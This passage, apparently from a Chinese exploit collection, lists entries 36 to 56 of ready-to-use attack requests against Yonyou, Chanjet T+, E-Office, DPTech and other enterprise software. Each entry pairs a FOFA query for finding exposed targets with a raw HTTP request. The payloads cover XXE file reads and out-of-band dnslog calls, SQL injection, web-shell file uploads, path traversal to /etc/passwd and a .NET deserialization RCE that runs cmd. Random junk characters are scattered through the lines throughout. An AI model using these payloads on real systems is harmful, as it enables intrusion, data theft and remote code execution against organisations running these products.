& S0 x/ p; p" v0 PHost: 203.25.218.166:8888! V9 v1 F/ C2 n* [5 J" I! Z ]
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info# Z0 I: R1 v W p, E$ n1 }
Accept-Encoding: gzip, deflate
. ` _. B+ k0 G4 m* N, F( @+ jAccept: */*
# X- n: a- x; [5 q, D6 R' b9 hConnection: close) P9 ^ `9 t8 A; m" d: g
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
# R7 N' K% X& S9 S" X3 oContent-Length: 190
B' k0 z1 ]$ RContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
; R; k6 h0 P* \7 v" A* M6 e+ D2 @/ d6 ]' L: b8 k
--fd28cb44e829ed1c197ec3bc71748df0
. P( r0 D* f. ?0 M/ C* _2 d* eContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp", V: k6 t$ i5 ]$ Q
, f5 u. e; k: m, v! \6 v3 B, I
<%out.println(1111*1111);%>
: u% t6 _$ i( t--fd28cb44e829ed1c197ec3bc71748df0--
+ W8 m+ v" p! [- C; R6 B* w0 A; K& H& q
# ^" c; [1 o0 M* y7 d
36. 用友NC-Cloud soapFormat XXE7 k1 T9 }3 z5 F+ o3 F+ a$ v. s1 M4 D8 d
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"3 _) [) y" B. I% n, j
POST /uapws/soapFormat.ajax HTTP/1.1 ~/ e+ c+ z/ X, ^7 g0 Y3 b
Host: 192.168.40.130:8989/ ?1 m2 B! X: `2 }( e+ j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
0 J4 Z& ~7 w; j) VContent-Length: 263
6 p6 V! I! g& @/ j$ H4 _. Z0 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- p5 T7 |5 c( h" M
Accept-Encoding: gzip, deflate$ l1 `! @: W6 v' c$ z& x) j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 M, x$ W! Z' E% a ]2 lConnection: close
1 g/ T$ y) r; V$ ?2 MContent-Type: application/x-www-form-urlencoded% L. I( E s" \& {- E c: K
Upgrade-Insecure-Requests: 1
$ b- M; d1 G8 Y$ H* _7 E
, k; r+ B& q" S/ ^msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a$ ~; h; } ]: F: f1 ^# o
7 W9 q8 \+ u# r4 O# L
- W8 A% Z3 |: Q$ L! r- N+ B9 O37. 用友NC-Cloud IUpdateService XXE, T# T, }- k: a. x
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"3 q" }0 A2 y9 L$ E
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1( W" _% A1 U/ b% q7 @: @3 @) S
Host: 192.168.40.130:8989; c/ M( R8 r. ]- n! J8 }0 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
. N J5 I0 R9 h0 tContent-Length: 421# H8 W- D. r2 P u9 S) }9 }1 m! W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ a% X2 n! u1 J4 R' b: S9 GAccept-Encoding: gzip, deflate3 t" z8 N* f* l
Accept-Language: zh-CN,zh;q=0.9
; u* v0 }1 q+ _" e4 W/ sConnection: close2 O: X! ^2 j% F& K6 _" F
Content-Type: text/xml;charset=UTF-8
9 v: M- d0 E4 BSOAPAction: urn:getResult
3 F0 G u: d- T) r3 V3 NUpgrade-Insecure-Requests: 1
( U U" \# b3 ?/ v, R) Z1 t" @" ?! Z. K0 `. ?6 }4 Z
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">" q; G! K" G2 l1 Z# c6 ~
<soapenv:Header/>
0 ?/ d X# ~2 u' S<soapenv:Body>) g2 h7 Y8 e! B r9 W! K
<iup:getResult>1 N: F! y7 O3 ]7 a9 `6 i
<!--type: string-->
- B4 p4 Z3 ? @8 u" I9 b* U6 F) Q+ F<iup:string><![CDATA[
3 E! i; S1 q) z4 i: [<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
/ G+ a S2 Z4 V) @<xxx/>]]></iup:string>
# ?. e6 {0 ]0 ^( N</iup:getResult>- q) T5 m! `0 V& a [. A% I
</soapenv:Body>
' k+ a" R/ p, ], n</soapenv:Envelope>0 k5 P2 x) ]6 j4 L6 W- T
* ?1 }9 E) j/ }3 D
4 T/ M& a3 x! R. q7 H
+ ^" o) e, [8 @# _+ K! p! [
38. 用友U8 Cloud smartweb2.RPC.d XXE x0 I3 _* j9 E/ l" F' |
FOFA:app="用友-U8-Cloud": P4 O/ Q8 B0 C) I4 T! W
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.14 y5 Q( Z3 ]/ v0 b
Host: 192.168.40.131:8088
0 \9 \8 N s. Z4 Y; ]9 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
6 k/ J$ X0 P* hContent-Length: 260( n! r$ s* ?0 K( C! c: E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3) G1 f9 D9 k4 v Q
Accept-Encoding: gzip, deflate* W3 m, s f: [+ L @2 L) y5 N+ F
Accept-Language: zh-CN,zh;q=0.9( y1 V: b7 H- w+ R
Connection: close
' b9 C: ?4 q8 B. KContent-Type: application/x-www-form-urlencoded% I( J% e+ b: j7 P# G3 ~$ l1 t7 |* ?
% U$ h$ l1 a* `2 c
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
8 w2 ]1 ]! ?/ ~% L m
1 l! P7 [6 @+ p' R+ ?6 n+ Z3 A3 ?
( j) ~# S+ p- o$ d s39. 用友U8 Cloud RegisterServlet SQL注入7 o0 D: g+ C; H, J, s. V( p
FOFA:title="u8c"* q, [) a& M: v" `. O
POST /servlet/RegisterServlet HTTP/1.1
5 _* M5 D$ O" ]. gHost: 192.168.86.128:8089
" M' i+ ], v* j3 d8 G8 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
$ v$ T0 ]* A4 W4 m; w% i& |Connection: close
& W: x* Y) v6 RContent-Length: 85
# y8 _. k. b& T; PAccept: */*
! W% Q) L" I4 Z5 l' T9 [Accept-Language: en
2 R+ A$ W- I6 R8 W, OContent-Type: application/x-www-form-urlencoded
" d) D7 P3 T; y. Y4 MX-Forwarded-For: 127.0.0.10 [1 }% D/ B3 a' z8 h: X7 |
Accept-Encoding: gzip& l( W: q8 n |( [2 f
* s! _8 F6 E2 {& k" tusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--6 X$ G2 C- z/ y: P
' {% `* j& m- u4 x+ c, T* w3 r! E' e E
40. 用友U8-Cloud XChangeServlet XXE
: `5 Y3 p6 Z5 f, A, aFOFA:app="用友-U8-Cloud"/ \& @. n5 u+ p8 g' i* g
POST /service/XChangeServlet HTTP/1.1
( c5 W; u1 x& X) ]2 Z Z" BHost: x.x.x.x; e! `! ^/ b" u7 J0 R' u
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
6 _" ^- n; g/ T+ Y, wContent-Type: text/xml* b% W- |0 m2 R0 m
Connection: close0 _# ^; Z2 k3 P& m6 p+ U- s
! Z- f5 o8 g3 @* b0 C8 b3 {7 U
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
$ S1 l% ]" u6 a1 f1 N9 a$ Z7 V1 ~, s# i1 F; M; s5 X! w
8 d2 ~ P) H( p3 [/ C5 h. w7 M
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
0 Q5 r7 I; ~- k/ ]FOFA:app="用友-U8-Cloud"
9 T- s3 e& j1 W/ _7 D3 P$ NGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1: N! N% L* W6 `5 _; i8 i$ I
Host:0 g/ e* d9 m* |! Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- _# A, u4 F- V0 y4 R! J
Content-Type: application/json
- n# X, Z$ R0 B7 p! E- s: S! h( DAccept-Encoding: gzip
2 d) e8 }! r; fConnection: close* U0 u& Q- I& [% J& j% ]
: }: h* h" V2 S ]( W( r# |
5 z4 R; U$ N9 c! O4 O* ]% P42. 用友GRP-U8 SmartUpload01 文件上传. c) k9 A- O: b! K8 g: L$ C
FOFA:app="用友-GRP-U8"+ L: k" n& O: a, @
POST /u8qx/SmartUpload01.jsp HTTP/1.1/ i3 j' @7 D) x) ]5 r
Host: x.x.x.x
- J0 ~5 P' m/ AContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
# w. b( c1 t0 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36- U }9 U+ M5 n/ d/ p+ y0 V* y
; M. `9 {2 S4 w4 P3 ~PAYLOAD
; x9 I% W# A- x0 J/ X# Q
6 q1 Q4 ?8 [0 L: B5 D& _! l8 {6 z9 Q' F+ w
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml- n% v3 B+ J: i' s- V
, I7 Y e7 h Y4 ?
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
. P+ O! C& o, ?5 u+ PFOFA:app="用友-GRP-U8"
7 u% a- }* G7 [0 Y' P2 LPOST /services/userInfoWeb HTTP/1.17 z. ?: W& v( n+ _
Host: your-ip
- W6 A, G- a3 P8 M2 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
" G0 b% g% c5 q) S0 HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' ?5 }" z! P- [* W" E, h* Z' TAccept-Encoding: gzip, deflate
" `6 e6 g' M$ u6 K& V- OAccept-Language: zh-CN,zh;q=0.9
3 ]& w8 n! ]! g( b% d% m, f+ bConnection: close
5 @) t6 V* Z! U0 ~; [SOAPAction:
+ I. b$ U5 y3 w( _. v( S2 L& k! q# YContent-Type: text/xml;charset=UTF-8
/ h! h, c. A# J' D6 i7 F* Y# `0 z3 q7 ]( Y& p( R) e
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">+ e6 M7 B z8 a- ~: K
<soapenv:Header/>
) q% G6 _9 g' D/ f* h- R <soapenv:Body>
2 D: O4 p0 z( ` f. { <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
$ }6 T. `* R$ l! t( t <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
) b" W+ I- P* p6 J9 ^ </ser:getUserNameById>6 M8 A) Y6 @* Q" V- o! n" y
</soapenv:Body>
9 s: D% U/ [. f% S: B7 L, ?: F</soapenv:Envelope>
2 g l, ]0 l! f# Q9 r6 |8 M+ I* U7 |+ V; \! {9 s
+ k& A4 u' n6 r( A9 V
44. 用友GRP-U8 bx_dj_check.jsp SQL注入; q# D6 |' y& E4 Z: s
FOFA:app="用友-GRP-U8"
2 u" T# {6 y+ jGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
5 q) W& D& l8 f8 V* hHost: your-ip' {# v9 _7 x2 f1 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36. S( C6 N& L" t8 D, @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- ?/ x3 b* z' G. B) y- a% N
Accept-Encoding: gzip, deflate
a4 r) G& L, YAccept-Language: zh-CN,zh;q=0.9: f$ d; D) w1 J. u; _! _
Connection: close
7 a& y# S. e+ V2 r1 e9 x* ^$ j$ I- E9 @& R7 b
: Q' E& [& w1 n6 X/ G
45. 用友GRP-U8 ufgovbank XXE
" f9 J; S$ q; }- d& Z, LFOFA:app="用友-GRP-U8"
% }- p6 y/ b1 {% I8 OPOST /ufgovbank HTTP/1.10 N0 E) p1 j2 H* {2 [
Host: 192.168.40.130:222
; n6 a( @# m* i0 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
! t) ~: W3 l& I2 N0 O/ k* xConnection: close
- u- g& w& S3 N& k% J, i( hContent-Length: 161
- X( ^+ [; A. _2 x# m' RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- D& z; P) v+ Z7 t( _/ j# B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, G* p+ _: D8 {6 _( q2 P" c5 T
Content-Type: application/x-www-form-urlencoded g- M, W8 d7 ~3 w
Accept-Encoding: gzip- {% ?, E! {; n" F) B
. Y7 E2 }) Z# s) f% [" o
reqData=<?xml version="1.0"?>
& i, x: i/ _% o- n! f<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest6 k7 K1 a, m' d
9 }+ q3 M' |/ M/ i. J/ ?6 |
2 P7 t7 u+ q+ P& _* A46. 用友GRP-U8 sqcxIndex.jsp SQL注入
& K# \" `9 }; o0 Y# Z0 RFOFA:app="用友-GRP-U8"# W5 P: Z0 J5 t# \2 \
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
4 |8 B, R& r# t/ e y; @6 Z+ t1 e9 {Host: your-ip( p4 v3 K, D" S& [6 o" P; e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
) o" X, [" x" j8 V/ x3 r' o! YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
M" ?- j% Z4 n1 k% [Accept-Encoding: gzip, deflate
+ R6 {: i% t, ~8 \/ e6 v1 s( @Accept-Language: zh-CN,zh;q=0.9: i: N6 U2 _, Z# j0 l; |" T% Y
Connection: close1 J1 o4 t0 o/ b$ l
- K0 F: N, {6 i O; u9 g" s$ m
1 N- Z) c A' A4 b: d t2 f
47. 用友GRP A++Cloud 政府财务云 任意文件读取' [/ A3 J/ b4 {$ ]
FOFA:body="/pf/portal/login/css/fonts/style.css"; ]8 f c5 d0 G3 w$ s" M2 [
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
( ?. Q8 z3 H) x$ }- lHost: x.x.x.x
8 W# _& }* g* ` q9 yCache-Control: max-age=0
$ W$ T H! |7 M: NUpgrade-Insecure-Requests: 1
1 W5 w- s) _/ i: i! lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! P! p, b9 v8 T% j& D9 T; \& dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 E# R w2 v. t3 s2 x8 Q& t
Accept-Encoding: gzip, deflate, br
: k+ |0 |( N: s. O q: R+ p+ s8 m8 W {Accept-Language: zh-CN,zh;q=0.9
& d k3 D& }# l( P1 ]4 t PIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT/ k# u4 y5 x) }1 C4 q' X9 O
Connection: close! ]" z$ D/ {7 \3 }4 N# r l |
& r* ~: h2 |- e# x
( T' ~* U! S- r" @' {& _
" ? P& R1 B9 M' @/ p
48. 用友U8 CRM swfupload 任意文件上传
- u3 T* y9 v9 o, W' p8 ?FOFA:title="用友U8CRM"
- W" w6 }: y/ L6 Q. `POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
) w6 h: j, m2 PHost: your-ip
3 _$ Q( b* v/ F: ]- JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
4 U2 D& G4 V( g# ^% P- P/ WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ {! w7 o# T7 l+ m1 r; k, HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- a' v6 J2 U# @. b ~' T' `1 E9 H
Accept-Encoding: gzip, deflate/ o8 ^+ W( P* P/ ~/ _/ t ]- L1 n) n
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
! \3 s9 a7 o( ^6 p$ h------269520967239406871642430066855
+ x$ L5 s& T& d4 Z N0 @' ?Content-Disposition: form-data; name="file"; filename="s.php"* K R7 ]1 s3 L/ |# ]! I# s
1231
8 Y. ^& q$ Q" S- TContent-Type: application/octet-stream
; M7 p! S3 @* j------269520967239406871642430066855
K; Z5 n7 Q1 v3 CContent-Disposition: form-data; name="upload"
/ t$ ~* m7 Z& O2 \' z0 kupload7 T# z. _' c; f# ?2 c1 F
------269520967239406871642430066855--
6 O: X- F/ D5 w8 t! O0 W/ |4 L5 G9 k \' R# \8 n4 L
: V7 a. N. H/ S5 @& Z) G* Q49. 用友U8 CRM系统uploadfile.php接口任意文件上传3 |' l: \% J2 y: K: v
FOFA:body="用友U8CRM"
+ I) r/ Y5 a7 A' K& A
# A+ o+ B" N/ MPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1! [5 o$ R, j+ k0 k" o
Host: x.x.x.x6 \! l s! f6 O( d( E7 g$ e0 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ P) r4 ^2 C/ X/ `+ P0 PContent-Length: 329
; Z, C1 U1 D3 t9 m- I2 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( p- z* V ^; G l
Accept-Encoding: gzip, deflate
& `& p! Z( Q# qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 j/ ^) `' F2 N7 T F, A. e
Connection: close
7 F0 w- A6 N& a4 l5 j4 R+ jContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w x+ @* ]% Y0 m ?& {
1 m! F* E. x) r8 n7 M2 p7 W0 c/ m-----------------------------vvv3wdayqv3yppdxvn3w+ C: h9 X8 O& P" w8 ?
Content-Disposition: form-data; name="file"; filename="%s.php "3 B# {: v1 x. r$ @3 ]1 K) O3 M
Content-Type: application/octet-stream
. N! ~& |/ g! B$ J! p; F& Q5 I! A
* |( y" B. ~4 Ywersqqmlumloqa
: {8 v: q: u" m" T-----------------------------vvv3wdayqv3yppdxvn3w
( j4 t( x% g( w9 p" i7 c" O$ }7 }, EContent-Disposition: form-data; name="upload"
% o; x( p2 k$ }4 K% [: g% ?
5 [; v9 f* U3 kupload# w/ u- _, k3 F/ W; o2 d
-----------------------------vvv3wdayqv3yppdxvn3w--( x5 \0 n9 Q% F3 h6 ]
! M; \% w @$ d& `
* M" |6 T1 u% C# zhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
$ b5 y2 `8 I4 J* I& P4 b( |5 m) n9 C( n v/ T( d! D
50. QDocs Smart School 6.4.1 filterRecords SQL注入6 P- n0 O: q( x( ?" C; X5 `9 _7 p" W2 V
FOFA:body="close closebtnmodal" K# y: A: f) R, q0 d" e$ y
POST /course/filterRecords/ HTTP/1.1
+ A+ l+ }; z' {7 G0 w' X; v6 qHost: x.x.x.x6 e2 v6 u. j0 {! q
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
, X/ L0 ?2 F& W- L" [% f' hConnection: close
( v- b, K# K+ p- ]8 QContent-Length: 224
# @2 m# J6 J8 `% G1 B) K0 QAccept: */*
0 M% {/ n) n' c2 ~3 sAccept-Language: en
% h# d* V. b4 O" c2 Q; TContent-Type: application/x-www-form-urlencoded+ G) C: V2 y2 y+ U( ^
Accept-Encoding: gzip
6 A5 e' e1 u9 |) r# P' S3 i0 P+ E6 Q
/ X: I3 _$ l$ A e. Zsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=19 b1 c9 I( r) n" N
. e6 d3 F0 z2 a. h9 b
6 l- C5 y% ~1 _5 W; t
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
# |1 F" N) K* _+ a* J3 C; sFOFA:app="云时空社会化商业ERP系统"
9 O) J; I& {9 ]$ L+ \* d' L+ v: lGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
( k- C O; ^5 s$ f5 b3 ~Host: your-ip- `! B" H$ d# z$ t2 J; Q/ r
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
; M" ~) D# }( Q! K. L4 E8 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.94 ~; [8 u) R* M: o6 i) V [
Accept-Encoding: gzip, deflate$ f% t$ a8 }. b3 `
Accept-Language: zh-CN,zh;q=0.9+ ~# O. S8 g' k# i/ b9 f
Connection: close
# O7 }3 ?+ Z+ I; p* q
- s% F# q$ z5 D% @1 z+ \5 z7 [- y3 D# S# |1 |' u0 C
52. 泛微E-Office json_common.php sql注入9 i( E& Q/ Z- m6 S( X: n# ?8 S4 r
FOFA:app="泛微-EOffice"
1 K0 D* O# b/ oPOST /building/json_common.php HTTP/1.18 r- t" }4 L7 [5 @9 R# c7 A
Host: 192.168.86.128:8097
# U+ i7 z. m' q/ q g9 kUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# ?! `( g: v9 A$ Y0 p* J6 `) F
Connection: close
4 I$ t+ e+ ?: ^: X5 s' NContent-Length: 87+ P) y, d2 [% _: a% b, B
Accept: */*
4 H Z4 r h1 D0 {1 z. J9 l5 DAccept-Language: en
' g0 s9 t+ Z9 S! KContent-Type: application/x-www-form-urlencoded
0 V0 n" B1 K6 x3 GAccept-Encoding: gzip
7 f( {+ @7 q2 u- c6 X! a% s; m' d; b/ C z' V& {$ ^) Y
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
( w9 Z0 L, p$ x" B
7 n# ^* D5 ^1 O9 Q
! H/ t+ f- w6 l `+ I) J5 x$ K53. 迪普 DPTech VPN Service 任意文件上传
x. ]: ?0 @/ `4 D2 P6 |FOFA:app="DPtech-SSLVPN"
+ o) B6 P2 I, f7 i- R6 s) q/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
: b2 J0 M$ p' J& ^$ `& g! d: q2 @7 S- N
$ ^: @2 t. e' N7 g$ I L& J. e54. 畅捷通T+ getstorewarehousebystore 远程代码执行
+ l. W# d0 Q# K% @FOFA:app="畅捷通-TPlus"
@, e" A3 G: B7 [4 \5 O第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
: }) E7 l! x+ R/ o6 i"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
) v8 r! c" a+ v/ q* Y& ?
7 C+ t6 X2 C5 |5 l9 D% Y% E) D! V2 j8 \7 E
完整数据包) G" V9 B+ Z4 ~+ `/ y! c3 N
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
# w7 ~- d; N* b' k; `1 r: ^Host: x.x.x.x
6 u2 M- K1 s8 _9 i* R! FUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F; Y$ `6 \0 I/ S1 t& w) f
Content-Length: 593
; _. b, u+ T/ s+ d% J4 M$ g# A* ^4 s- X4 J
{
6 T' [2 J6 b) s7 G e6 ]"storeID":{* D1 c* s! \& G% w7 d" B
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
5 Q9 y0 F4 A7 ~ Z, q) q: V "MethodName":"Start",
, a1 `" \% r: Q7 g4 d% d4 Y "ObjectInstance":{( Y0 e1 v b- v$ A2 q% d
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
0 Z: Y5 k) p( s7 y# V; o7 ]& r "StartInfo":{- D' l+ c& |) q/ ^; p
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",- l1 h: M! o& H; C0 ~# q0 y
"FileName":"cmd",+ [# \* P) D+ h$ W8 u
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"$ ?& `7 f$ H: D5 n* @+ m
}/ n/ R* C5 E5 t# `
} y, k1 U) D; v& h1 R# _
}+ a* V2 @4 k1 A) M+ ^3 w
}4 F; ], l1 _5 L3 J- T
& n. H7 Y1 _( K: C7 b
7 P, s1 i2 ]3 R- p. c; D; B; X第二步,访问如下url" c; Y! Y9 [! e9 w' @/ T2 D6 ?
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt- m7 C7 r: y/ D- \( L7 ~ d8 J$ G9 p
: y5 N! L2 K2 j2 X V/ m; _ F, E; @. U
55. 畅捷通T+ getdecallusers信息泄露% A% K3 z/ Y' @6 q4 Q' n1 }/ _4 d
FOFA:app="畅捷通-TPlus"1 O4 g8 ?* G1 Z' @+ J* C0 Q) |% x4 z
第一步,通过
! ^: }! i' i" E$ R/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
5 J0 E% y8 U4 Y第二步,利用获取到的Cookie请求3 P/ M! n( P. w7 u+ a: [0 g
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
, Y% M2 p3 ?. b4 R* b0 b
, E2 T r. _& X9 E" y$ B56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
+ g6 T5 [, p5 u4 t& E l; F( \/ dFOFA: app="畅捷通-TPlus"- z" s8 \: @! D, ]
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
8 W3 B4 o$ {; f' g$ e1 w; r7 yHost: x.x.x.x v) @% N$ R* X+ e6 M/ r: _; ^! g) B. @
